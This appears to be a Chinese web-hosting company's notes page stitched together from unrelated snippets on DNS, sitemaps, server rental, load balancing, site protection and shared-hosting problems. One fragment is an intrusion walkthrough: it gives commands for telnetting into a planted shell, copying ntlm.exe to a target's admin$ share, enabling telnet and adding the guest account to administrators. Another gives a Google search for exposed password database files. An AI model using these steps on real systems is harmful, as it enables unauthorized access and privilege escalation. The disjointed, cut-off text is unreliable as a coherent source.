七彩学习笔记

DNSPod 建立于2006年3月份，是一款免费智能DNS产品。
DNSPod 可以为同时有电信、网通、教育网服务器的网站提供智能的解析，让电信用户访问电信的服务器，网通的用户访问网通的服务器，达到互联互通的效果。
当然，不需要智能解析的普通用户也可以用我们的服务。我们不限制用户的域名、记录数量，并且提供别的DNS服务提供商没有提供的服务。

如果你的网站确实需要制作一个网站地图，我这里也有一些建议可供大家参考。网站地图要实用，花太多时间在美工上，把网站地图弄得花里胡哨，这个没有必要。网站地图最好是纯文本的内容，这样用户访问速度比较快，另外搜索引擎对文字链接比较喜欢，这里就不赞成采用图片或者FLASH来制作网站地图了，尤其是FLASH！
别太过分提升网站地图的作用了，它只是一个网站辅助工具，既然是辅助，有些网站是需要的，但是也有网站是不需要这个东西的，甚至有的网站首页本身就起到了网站地图的作用。

网站地图的作用是当用户查询到网站时能让用户一目了然的看清楚网站的实质作用,帮助用户更快的查询到所需要的信息.同时为搜索引擎提供绿色通道,使引擎程序迅速收录主要网页.得到较好的排名,让用户更容易找到您的站.
所以一个好的网站地图即要考虑到用户的需求,也要考虑到引擎的需求,本人总结了以下几个方面:
一 提供文本连接到站点上主要的页面,根据网站大小,网页数目的多少甚至可以连接到所有的页面.
二 为每个连接提供一个简短的介绍,用以提示访问者这部分内容是关于哪一方面的.
三 在网站地图和文本超连接里面提及最主要的关键词语,帮助搜索引擎识别所连接页面主题是关于哪一方面的.

如今随着web2.0、P2P、播客等网络新生事物的出现，第2次互联网热潮已经到来。各类网站或网络企业对网络资源的需求也就日益膨胀，因此，服务器租用、虚拟主机等IDC业务火爆异常，06年整个IDC行业收益大概在23亿多。目前国内的大部分IDC服务商都提供了月付服务。能不能提供月付也反应了主机商的实力，大的有实力的服务器租用商现在都提供月付服务。月付服务是一种降低用户一次性投入的付款形式，其相对其他付款形式的优势在于：
1 费用低 ，选择月付可以大大降低开始没有多大经济实力的站长负担
2 风险小 ，目前网络骗子很多，而服务器租用是个涉及较大数目人民币的网络服务，服务器租用月付大大可以大大降低站长的风险。想想看一台普通服务器租用一年的费用都在一万左右，如果不良主机商倒闭或者故意卷款潜逃，你哭天都没有用了。
3 服务好 ，提供月付的主机租用商都是整体服务比较好，比较完善的，如果你感觉他服务不好，你下个月大可把人家踢掉换一个主机商。

当前局域网交换机所谓的第四层交换技术，就是按照IP地址和TCP端口进行虚拟连接的交换，直接将数据包发送到目的计算机的相应端口。通过交换机就能将来自外部的初始连接请求，分别与内部的多个地址相联系，此后就能对这些已经建立的虚拟连接进行交换。因此，一些具备第四层交换能力的局域网交换机，就能作为一个硬件负载均衡器，完成服务器的负载均衡。
由于第四层交换基于硬件芯片，因此其性能非常优秀，尤其是对于网络传输速度和交换速度远远超过普通的数据包转发。然而，正因为它是使用硬件实现的，因此也不够灵活，仅仅能够处理几种最标准的应用协议的负载均衡，如HTTP 。当前负载均衡主要用于解决服务器的处理能力不足的问题，因此并不能充分发挥交换机带来的高网络带宽的优点。

　　当参与集群的计算机和作为控制管理的计算机在同一个网段时可以用此法，控制管理的计算机接收到请求包时直接送到参与集群的节点。优点是返回给客户的流量不经过控制主机，速度快开销少。
　　网络地址转换(NAT)
　　这种方法可能大家较熟悉，地址转换器有能被外界访问到的合法IP地址，它修改来自专有网络的流出包的地址，外界看起来包是来自地址转换器本身，当外界包送到转换器时，它能判断出应该将包送到内部网的哪个节点。优点是节省IP地址，能对内部进行伪装；缺点是效率低，因为返回给请求方的流量经过转换器。
　　隧道技术(Tunneling)
　　这种方式是在集群的节点不在同一个网段时可用的转发机制，是将IP包封装在其他网络流量中的方法，为了安全的考虑，应该使用隧道技术中的VPN,也可使用租用专线。

　　二、网站的专用保护方法
　　尽管采用的各种安全措施能防止很多黑客的攻击，然而由于各种操作系统和服务器软件漏洞的不断发现，攻击方法层出不穷，技术高明的黑客还是能突破层层保护，获得系统的控制权限，从而达到破坏主页的目的。这种情况下，一些网络安全公司推出了专门针对网站的保护软件，只保护网站最重要的内容--网页。一旦检测到被保护的文件发生了{非正常的}改变，就进行恢复。一般情况下，系统首先需要对正常的页面文件进行备份，然后启动检测机制，检查文件是否被修改，如果被修改就需要进行恢复。我们对以下几个方面的技术进行分析比较：

　　改造操作系统的时候，除通信所需的一些命令文件保持原名外，很多命令文件连文件名都换掉(有人认为这是小花样，呵呵)，大量功能被重写，黑客即使拿到权限坐在服务器面前，也取不到数据。
　　有网站首席安全官认为放一扇门让别人一个劲砸，不如给人两条路让人选择正确的或者不正确的，所有使用错误帐号和密码去试系统的人，都会被允许以匿名身份登录到一个shell里，那个shell跟真的系统很象，嗯，只是很象，但其实是个空壳，所有的指令，都会被以最小代价运行，调用假的信息界面出来。有的甚至里面放了陷阱，欺骗性引导黑客自动送上身份资料或其他一些敏感信息，毕竟黑客可能通过境外跳板过来，如果不是黑客主动送上，网站方很难获得黑客身份资料的。
　　使用自己的安全策略，对已有的攻击手段都有相应的防护措施。比如说对syn flood这样的，就是临时降低服务质量，降低半连接等待时间，这样连接的成功率会降低，但是不会造成服务被停。

　　一、网络负载平衡的优点
　　1.网络负载平衡允许你将传入的请求传播到最多达32台的服务器上，即可以使用最多32台服务器共同分担对外的网络请求服务。网络负载平衡技术保证即使是在负载很重的情况下它们也能作出快速响应。
　　2.网络负载平衡对外只须提供一个IP地址（或域名）。
　　3.如果网络负载平衡中的一台或几台服务器不可用时，服务不会中断。网络负载平衡自动检测到服务器不可用时，能够迅速在剩余的服务器中重新指派客户机通讯。此保护措施能够帮助你为关键的业务程序提供不中断的服务。可以根据网络访问量的增多来增加网络负载平衡服务器的数量。
　　4.网络负载平衡可在普通的计算机上实现。

共享服务器不稳定或网站打开慢的原因
　　1、用户无法将自己的站点做合适的定位，选择的主机不适合自己的站点，比如说一个日IP1万以上的站点，推荐客户需要10人的合租服务器，可有的可户为了省钱或出自其它方面的考虑，用了80人的合租服务器，这样不仅自己的站点访问受影响也致使同服务器的其它站点也受影响，很多“Service Unavailable”的问题就是因此而起的。建议用户能冷静的分析下自己的站点情况，不要给自己的站点穿小鞋，这样站点在发展过程中也会受影响。在购买前最好咨询销售人员，选择适合自己的空间。
　　2、合租的主机不推荐有大量下载、在线播放的站点存放，这类型的站点，选用独立主机是个比较不错的选择。有的用户站点，本身的站点流量不大，但是占资源却大的惊人，这时候资源的盗链就是一个首先要解决的问题，下载文件，音乐文件，图片等都极有可能被盗链，做好防盗链措施，是保证站点稳定的一个保障。另外还有采集、生成静态等操作也很占资源，推荐大家避开网络高峰期使用。

qicaispace.net的详细信息：
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: QICAISPACE.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.EVERDNS.COM
Name Server: NS2.EVERDNS.COM

　　6. C:\>telnet 127.0.0.1 99
　　这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
　　虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
　　7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
　　用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
　　8. C:\WINNT\system32>ntlm
　　输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
　　9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组

　　2.利用Google搜索密码文件
　　对于一个黑客来说，最感兴趣的可能就是密码文件了，而利用Google的一些特殊语法命令，可以搜索出大量的密码文件。如利用Google 搜索：intitle:"index of" pwd.db 这个关键字，就可以搜索出很多密码数据库文件，有经验的黑客可以将这些密码文件下载后破解，从而实现入侵。
　　不难看出，Google拥有着强大的搜索能力，而也正因如此，Google也得到了许多黑客的青睐。黑客们正在利用一些由特殊字符组成的命令来搜索出敏感信息，进而实现入侵。作为网络管理员，则更应该提高防范意识，建议采用一些手段来进行防范，如：修改论坛程序的关键字，让黑客无法通过Google搜索到;及时给自己的论坛程序打补丁;设置好防火墙权限，防止黑客下载到自己的数据库文件;修改密码数据库文件名称，使黑客搜索不到等等。采用了这些措施，可以为有效地为自己的服务器加固，保护论坛正常运行。

2007 年 6 月 28 日 早上 5 : 41 分, 七彩空间网站受到黑客攻击 , 成百上千网页被挂马! 到该日上午10:00左右才得到及得处理~~
历时数个小时, 但已经在GOOGLE里留下了不少的很遗症, 很多的被挂马的网页在GOOGLE的搜索结果里, 显示为了补充材料~
但这只是初步的影响, 更为严重的后果可能要在后面了~~ 这是个难以预测的结果~
七彩空间在外有不少的反向链接, 所以搜索引擎更新网站的频率要比其他的网站稍高一些, 所以网站一但有细小的变动. 搜索引擎里都会很快表现出来~
以下内容: 全部被识别为补充材料了~

当某一个用户的站点超出了服务器上的设制后，访问站点时就会出现服务器忙，或目前访问该站点的人数过多，超出了WEB的处理能力等相关错误提示。
当用户的站点出现了以上提示后应该如何解决呢？
首先，查看您的站点是否是受众人很多，如果确实有很多人在线访问，那么唯一的方案就是向空间提供商提出升级您的空间，以适应更多的人来访问您的站点；
其二，如果您感觉站点的在线人数应该不会超过设限值，那么，就应该检查您站点内的内容，是否有图片、FLASH、音乐、下载文件、电影等比较引人注目的文件被别人盗链使用！一般很多访问人数比较少的站点出现这种情况，多是被别人盗链引起的，如果发现可疑的被人盗链接的文件，请删除或更换目录。